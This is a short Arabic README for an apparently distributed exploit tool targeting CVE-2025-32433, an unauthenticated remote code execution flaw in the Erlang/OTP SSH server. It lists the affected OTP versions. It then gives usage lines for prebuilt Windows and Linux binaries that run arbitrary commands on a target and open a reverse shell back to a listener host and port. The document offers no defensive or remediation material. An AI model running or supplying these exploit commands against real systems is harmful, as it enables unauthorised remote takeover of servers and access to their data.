
CVE-2025-32433 أداة استغلال ثغرة تنفيذ الأوامر عن بعد في Erlang/OTP SSH
تم تحديد ثغرة خطيرة في خادم SSH الخاص بـ Erlang/OTP قد تسمح للمهاجم بتنفيذ تعليمات برمجية عن بعد (RCE) دون مصادقة. من خلال استغلال خلل في معالجة رسائل بروتوكول SSH، يمكن للمهاجم الضار الحصول على وصول غير مصرح به إلى الأنظمة المتأثرة وتنفيذ أوامر عشوائية دون بيانات اعتماد صالحة. قد يؤدي ذلك إلى اختراق هذه المضيفات، مما يسمح بالوصول غير المصرح به إلى البيانات الحساسة والتلاعب بها من قبل أطراف ثالثة، أو هجمات رفض الخدمة.
OTP-27.3.2 والإصدارات الأقدم
OTP-26.2.5.10 والإصدارات الأقدم
OTP-25.3.2.19 والإصدارات الأقدم
cve-2025-32433.exe 127.0.0.1 -c 'id'
./cve-2025-32433.lnx 127.0.0.1 -c 'id'
cve-2025-32433.exe 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
./cve-2025-32433.lnx 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
